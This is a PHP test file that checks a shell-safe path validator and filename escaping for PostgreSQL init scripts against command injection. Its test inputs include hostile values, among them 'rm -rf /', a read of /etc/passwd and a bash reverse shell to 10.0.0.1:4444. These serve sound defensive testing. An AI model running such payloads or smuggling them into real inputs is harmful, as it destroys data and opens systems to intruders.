76 lines
2.9 KiB
PHP
76 lines
2.9 KiB
PHP
<?php
|
|
|
|
/**
|
|
* PostgreSQL Init Script Security Tests
|
|
*
|
|
* Tests to ensure PostgreSQL init script management is protected against
|
|
* command injection attacks via malicious filenames.
|
|
*
|
|
* Related Issues: #3, #4 in security_issues.md
|
|
* Related Files: app/Livewire/Project/Database/Postgresql/General.php
|
|
*/
|
|
test('postgresql init script rejects command injection in filename with command substitution', function () {
|
|
expect(fn () => validateShellSafePath('test$(whoami)', 'init script filename'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('postgresql init script rejects command injection with semicolon', function () {
|
|
expect(fn () => validateShellSafePath('test; rm -rf /', 'init script filename'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('postgresql init script rejects command injection with pipe', function () {
|
|
expect(fn () => validateShellSafePath('test | whoami', 'init script filename'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('postgresql init script rejects command injection with backticks', function () {
|
|
expect(fn () => validateShellSafePath('test`id`', 'init script filename'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('postgresql init script rejects command injection with ampersand', function () {
|
|
expect(fn () => validateShellSafePath('test && whoami', 'init script filename'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('postgresql init script rejects command injection with redirect operators', function () {
|
|
expect(fn () => validateShellSafePath('test > /tmp/evil', 'init script filename'))
|
|
->toThrow(Exception::class);
|
|
|
|
expect(fn () => validateShellSafePath('test < /etc/passwd', 'init script filename'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('postgresql init script rejects reverse shell payload', function () {
|
|
expect(fn () => validateShellSafePath('test$(bash -i >& /dev/tcp/10.0.0.1/4444 0>&1)', 'init script filename'))
|
|
->toThrow(Exception::class);
|
|
});
|
|
|
|
test('postgresql init script escapes filenames properly', function () {
|
|
$filename = "init'script.sql";
|
|
$escaped = escapeshellarg($filename);
|
|
|
|
expect($escaped)->toBe("'init'\\''script.sql'");
|
|
});
|
|
|
|
test('postgresql init script escapes special characters', function () {
|
|
$filename = 'init script with spaces.sql';
|
|
$escaped = escapeshellarg($filename);
|
|
|
|
expect($escaped)->toBe("'init script with spaces.sql'");
|
|
});
|
|
|
|
test('postgresql init script accepts legitimate filenames', function () {
|
|
expect(fn () => validateShellSafePath('init.sql', 'init script filename'))
|
|
->not->toThrow(Exception::class);
|
|
|
|
expect(fn () => validateShellSafePath('01_schema.sql', 'init script filename'))
|
|
->not->toThrow(Exception::class);
|
|
|
|
expect(fn () => validateShellSafePath('init-script.sh', 'init script filename'))
|
|
->not->toThrow(Exception::class);
|
|
|
|
expect(fn () => validateShellSafePath('setup_db.sql', 'init script filename'))
|
|
->not->toThrow(Exception::class);
|
|
});
|